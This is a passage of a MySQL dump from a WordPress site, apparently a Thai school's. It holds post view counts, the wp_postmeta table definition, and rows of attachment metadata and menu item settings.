(1036,3,'2024',49),
(609,3,'2024',50),
(871,3,'2024',51),
(1003,3,'2024',51),
(703,3,'2024',53),
(476,3,'2024',55),
(643,3,'2024',56),
(780,3,'2024',58),
(605,3,'2024',62),
(362,3,'2024',64),
(650,3,'2024',64),
(469,3,'2024',69),
(506,3,'2024',79),
(840,3,'2024',108),
(355,3,'2024',289),
(14,3,'2024',12772),
(1637,3,'2025',1),
(1676,3,'2025',1),
(1611,3,'2025',30),
(1502,3,'2025',31),
(1684,3,'2025',33),
(1558,3,'2025',36),
(1523,3,'2025',37),
(1540,3,'2025',37),
(1623,3,'2025',37),
(1704,3,'2025',37),
(1754,3,'2025',40),
(1594,3,'2025',45),
(1571,3,'2025',46),
(1697,3,'2025',47),
(851,3,'2025',56),
(771,3,'2025',59),
(840,3,'2025',64),
(855,3,'2025',65),
(1059,3,'2025',67),
(703,3,'2025',68),
(824,3,'2025',68),
(831,3,'2025',68),
(1016,3,'2025',68),
(1036,3,'2025',68),
(1052,3,'2025',68),
(680,3,'2025',69),
(780,3,'2025',69),
(836,3,'2025',69),
(542,3,'2025',70),
(1020,3,'2025',73),
(716,3,'2025',74),
(1915,3,'2025',74),
(708,3,'2025',76),
(700,3,'2025',84),
(748,3,'2025',84),
(784,3,'2025',84),
(1010,3,'2025',86),
(776,3,'2025',87),
(506,3,'2025',88),
(656,3,'2025',88),
(1003,3,'2025',88),
(484,3,'2025',89),
(810,3,'2025',92),
(1032,3,'2025',95),
(828,3,'2025',96),
(563,3,'2025',97),
(496,3,'2025',99),
(459,3,'2025',101),
(712,3,'2025',101),
(566,3,'2025',102),
(859,3,'2025',105),
(900,3,'2025',107),
(546,3,'2025',118),
(741,3,'2025',118),
(650,3,'2025',129),
(609,3,'2025',141),
(476,3,'2025',142),
(362,3,'2025',151),
(605,3,'2025',151),
(643,3,'2025',158),
(469,3,'2025',167),
(871,3,'2025',197),
(355,3,'2025',553),
(14,3,'2025',4544),
(1676,4,'total',0),
(66,4,'total',1),
(95,4,'total',1),
(1105,4,'total',1),
(1637,4,'total',1),
(1611,4,'total',30),
(1502,4,'total',31),
(1684,4,'total',32),
(1523,4,'total',36),
(1558,4,'total',36),
(1623,4,'total',36),
(1540,4,'total',37),
(1704,4,'total',37),
(1754,4,'total',40),
(1594,4,'total',45),
(1571,4,'total',46),
(1697,4,'total',47),
(1915,4,'total',71),
(851,4,'total',102),
(771,4,'total',105),
(836,4,'total',108),
(1059,4,'total',108),
(1016,4,'total',109),
(542,4,'total',110),
(716,4,'total',110),
(680,4,'total',113),
(1020,4,'total',113),
(1052,4,'total',113),
(855,4,'total',114),
(824,4,'total',117),
(831,4,'total',117),
(1036,4,'total',117),
(748,4,'total',119),
(703,4,'total',120),
(708,4,'total',121),
(700,4,'total',126),
(780,4,'total',127),
(810,4,'total',127),
(1010,4,'total',129),
(1032,4,'total',130),
(563,4,'total',131),
(656,4,'total',131),
(784,4,'total',131),
(484,4,'total',133),
(776,4,'total',133),
(828,4,'total',141),
(459,4,'total',142),
(496,4,'total',144),
(712,4,'total',144),
(566,4,'total',148),
(859,4,'total',148),
(900,4,'total',150),
(741,4,'total',157),
(546,4,'total',163),
(506,4,'total',167),
(840,4,'total',172),
(1003,4,'total',181),
(609,4,'total',191),
(650,4,'total',193),
(476,4,'total',195),
(605,4,'total',213),
(643,4,'total',214),
(362,4,'total',215),
(469,4,'total',235),
(871,4,'total',247),
(355,4,'total',842),
(14,4,'total',17308);
/*!40000 ALTER TABLE `wp_post_views` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=5715 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES
(1,2,'_wp_page_template','default'),
(2,3,'_wp_page_template','default'),
(11,9,'_wp_attached_file','2024/07/โรงเรียนบ้านหนองปลาเข็ง-กอไหล่.png'),
(12,9,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:100;s:4:\"file\";s:100:\"2024/07/โรงเรียนบ้านหนองปลาเข็ง-กอไหล่.png\";s:8:\"filesize\";i:27693;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:99:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-300x50.png\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10598;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:100:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-150x100.png\";s:5:\"width\";i:150;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5148;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:100:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่-360x100.png\";s:5:\"width\";i:360;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12135;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13,10,'_wp_attached_file','2024/07/เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย.png'),
(14,10,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:111:\"2024/07/เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย.png\";s:8:\"filesize\";i:92400;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:111:\"เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41184;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:111:\"เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12036;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:111:\"เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:53611;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15,11,'_wp_attached_file','2024/07/cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย.png'),
(16,11,'_wp_attachment_context','site-icon'),
(17,11,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:119:\"2024/07/cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย.png\";s:8:\"filesize\";i:105998;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:119:\"cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41386;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:119:\"cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12157;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:119:\"cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:53469;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:119:\"cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34299;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:119:\"cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18744;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:119:\"cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16741;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:117:\"cropped-เพิ่มข้อความในส่วนเนื้อหาเล็กน้อย-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:939;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(22,14,'_edit_lock','1757578264:1'),
(23,14,'_edit_last','1'),
(24,14,'title_style','hidden'),
(25,14,'_title_style','field_5d1a0217cf408'),
(26,15,'title_style','default'),
(27,15,'_title_style','field_5d1a0217cf408'),
(28,16,'_menu_item_type','post_type'),
(29,16,'_menu_item_menu_item_parent','0'),
(30,16,'_menu_item_object_id','14'),
(31,16,'_menu_item_object','page'),
(32,16,'_menu_item_target',''),
(33,16,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(34,16,'_menu_item_xfn',''),
(35,16,'_menu_item_url',''),
(37,17,'_menu_item_type','custom'),
(38,17,'_menu_item_menu_item_parent','0'),
(39,17,'_menu_item_object_id','17'),
(40,17,'_menu_item_object','custom'),
(41,17,'_menu_item_target',''),
(42,17,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(43,17,'_menu_item_xfn',''),
(44,17,'_menu_item_url','#'),
(46,18,'_menu_item_type','custom'),
(47,18,'_menu_item_menu_item_parent','0'),
(48,18,'_menu_item_object_id','18'),
(49,18,'_menu_item_object','custom'),
(50,18,'_menu_item_target',''),
(51,18,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(52,18,'_menu_item_xfn',''),
(53,18,'_menu_item_url','http://pakhaeng.ssk.in.th/?page_id=605'),
(55,19,'_menu_item_type','custom'),
(56,19,'_menu_item_menu_item_parent','0'),
(57,19,'_menu_item_object_id','19'),
(58,19,'_menu_item_object','custom'),
(59,19,'_menu_item_target',''),
(60,19,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(61,19,'_menu_item_xfn',''),
(62,19,'_menu_item_url','http://pakhaeng.ssk.in.th/?page_id=871'),
(64,20,'_menu_item_type','custom'),
(65,20,'_menu_item_menu_item_parent','0'),
(66,20,'_menu_item_object_id','20'),
(67,20,'_menu_item_object','custom'),
(68,20,'_menu_item_target',''),
(69,20,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(70,20,'_menu_item_xfn',''),
(71,20,'_menu_item_url','http://pakhaeng.ssk.in.th/?page_id=362'),
(73,21,'_wp_attached_file','2024/07/ผอ.png'),
(74,21,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1051;s:6:\"height\";i:1280;s:4:\"file\";s:18:\"2024/07/ผอ.png\";s:8:\"filesize\";i:455925;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"ผอ-246x300.png\";s:5:\"width\";i:246;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36589;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"ผอ-841x1024.png\";s:5:\"width\";i:841;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:243805;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ผอ-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14203;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"ผอ-768x935.png\";s:5:\"width\";i:768;s:6:\"height\";i:935;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:213544;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"ผอ-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37194;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(76,23,'_wp_attached_file','2024/07/โรงเรียนบ้านโคกสะอาด.png'),
(77,23,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:72:\"2024/07/โรงเรียนบ้านโคกสะอาด.png\";s:8:\"filesize\";i:249049;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:72:\"โรงเรียนบ้านโคกสะอาด-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20430;}s:5:\"large\";a:5:{s:4:\"file\";s:73:\"โรงเรียนบ้านโคกสะอาด-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:192892;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:72:\"โรงเรียนบ้านโคกสะอาด-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8715;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:72:\"โรงเรียนบ้านโคกสะอาด-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98218;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:72:\"โรงเรียนบ้านโคกสะอาด-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33669;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(78,23,'_wp_attachment_image_alt','โรงเรียนบ้านหนองปลาเข็ง-กอไหล่'),
(79,14,'_generateblocks_dynamic_css_version','2.1.1'),
(80,24,'title_style','default'),
(81,24,'_title_style','field_5d1a0217cf408'),
(82,25,'title_style','default'),
(83,25,'_title_style','field_5d1a0217cf408'),
(84,26,'title_style','default'),
(85,26,'_title_style','field_5d1a0217cf408'),
(88,28,'title_style','default'),
(89,28,'_title_style','field_5d1a0217cf408'),
(91,30,'_wp_attached_file','2024/07/ผอ-1.png'),
(92,30,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:564;s:6:\"height\";i:869;s:4:\"file\";s:20:\"2024/07/ผอ-1.png\";s:8:\"filesize\";i:513858;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"ผอ-1-195x300.png\";s:5:\"width\";i:195;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59726;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"ผอ-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27245;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"ผอ-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69059;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(93,31,'title_style','default'),
(94,31,'_title_style','field_5d1a0217cf408'),
(95,32,'title_style','default'),
(96,32,'_title_style','field_5d1a0217cf408'),
(98,34,'title_style','default'),
(99,34,'_title_style','field_5d1a0217cf408'),
(100,35,'title_style','default'),
(101,35,'_title_style','field_5d1a0217cf408'),
(102,36,'title_style','default'),
(103,36,'_title_style','field_5d1a0217cf408'),
(104,37,'_edit_lock','1722051583:1'),
(105,38,'_wp_attached_file','2024/07/453076658_992854945965510_707218750599466906_n.jpg'),
(106,38,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:58:\"2024/07/453076658_992854945965510_707218750599466906_n.jpg\";s:8:\"filesize\";i:432820;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:58:\"453076658_992854945965510_707218750599466906_n-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14870;}s:5:\"large\";a:5:{s:4:\"file\";s:59:\"453076658_992854945965510_707218750599466906_n-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118560;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:58:\"453076658_992854945965510_707218750599466906_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7827;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:58:\"453076658_992854945965510_707218750599466906_n-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72413;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:59:\"453076658_992854945965510_707218750599466906_n-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:232501;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:58:\"453076658_992854945965510_707218750599466906_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18852;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(108,37,'_thumbnail_id','38'),
(109,37,'_edit_last','1'),
(111,37,'title_style','default'),
(112,37,'_title_style','field_5d1a0217cf408'),
(113,37,'related',''),
(114,37,'_related','field_603b51c3e183e'),
(115,39,'title_style','default'),
(116,39,'_title_style','field_5d1a0217cf408'),
(117,39,'related',''),
(118,39,'_related','field_603b51c3e183e'),
(120,41,'title_style','default'),
(121,41,'_title_style','field_5d1a0217cf408'),
(123,43,'title_style','default'),
(124,43,'_title_style','field_5d1a0217cf408'),
(125,44,'title_style','default'),
(126,44,'_title_style','field_5d1a0217cf408'),
(127,45,'title_style','default'),
(128,45,'_title_style','field_5d1a0217cf408'),
(129,46,'title_style','default'),
(130,46,'_title_style','field_5d1a0217cf408'),
(132,48,'title_style','default'),
(133,48,'_title_style','field_5d1a0217cf408'),
(134,49,'title_style','default'),
(135,49,'_title_style','field_5d1a0217cf408'),
(136,50,'title_style','default'),
(137,50,'_title_style','field_5d1a0217cf408'),
(138,51,'title_style','default'),
(139,51,'_title_style','field_5d1a0217cf408'),
(140,52,'title_style','default'),
(141,52,'_title_style','field_5d1a0217cf408'),
(143,54,'title_style','default'),
(144,54,'_title_style','field_5d1a0217cf408'),
(145,55,'title_style','default'),
(146,55,'_title_style','field_5d1a0217cf408'),
(147,56,'title_style','default'),
(148,56,'_title_style','field_5d1a0217cf408'),
(149,57,'title_style','default'),
(150,57,'_title_style','field_5d1a0217cf408'),
(152,59,'title_style','default'),
(153,59,'_title_style','field_5d1a0217cf408'),
(154,60,'title_style','default'),
(155,60,'_title_style','field_5d1a0217cf408'),
(156,61,'title_style','default'),
(157,61,'_title_style','field_5d1a0217cf408'),
(158,62,'title_style','default'),
(159,62,'_title_style','field_5d1a0217cf408'),
(160,63,'_edit_lock','1722057692:1'),
(161,64,'_wp_attached_file','2024/07/451597685_986141419970196_8042590559662739129_n.jpg'),
(162,64,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:59:\"2024/07/451597685_986141419970196_8042590559662739129_n.jpg\";s:8:\"filesize\";i:446908;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"451597685_986141419970196_8042590559662739129_n-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17762;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"451597685_986141419970196_8042590559662739129_n-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134561;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"451597685_986141419970196_8042590559662739129_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8581;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"451597685_986141419970196_8042590559662739129_n-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83978;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:60:\"451597685_986141419970196_8042590559662739129_n-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:252652;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"451597685_986141419970196_8042590559662739129_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22544;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(164,63,'_thumbnail_id','64'),
(165,63,'_edit_last','1'),
(166,63,'title_style','default'),
(167,63,'_title_style','field_5d1a0217cf408'),
(168,63,'related',''),
(169,63,'_related','field_603b51c3e183e'),
(170,65,'title_style','default'),
(171,65,'_title_style','field_5d1a0217cf408'),
(172,65,'related',''),
(173,65,'_related','field_603b51c3e183e'),
(174,66,'_edit_lock','1722055516:1'),
(175,67,'_wp_attached_file','2024/07/449701918_978142027436802_6634460632883753055_n.jpg'),
(176,67,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:4:\"file\";s:59:\"2024/07/449701918_978142027436802_6634460632883753055_n.jpg\";s:8:\"filesize\";i:574134;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"449701918_978142027436802_6634460632883753055_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24520;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"449701918_978142027436802_6634460632883753055_n-1024x769.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:769;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:215870;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"449701918_978142027436802_6634460632883753055_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9113;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"449701918_978142027436802_6634460632883753055_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128598;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:61:\"449701918_978142027436802_6634460632883753055_n-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:409079;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"449701918_978142027436802_6634460632883753055_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24903;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(178,66,'_thumbnail_id','67'),
(179,66,'_edit_last','1'),
(180,66,'title_style','default'),
(181,66,'_title_style','field_5d1a0217cf408'),
(182,66,'related',''),
(183,66,'_related','field_603b51c3e183e'),
(184,68,'title_style','default'),
(185,68,'_title_style','field_5d1a0217cf408'),
(186,68,'related',''),
(187,68,'_related','field_603b51c3e183e'),
(188,69,'_edit_lock','1722053205:1'),
(189,70,'_wp_attached_file','2024/07/449338885_977488297502175_3280432045101593419_n.jpg'),
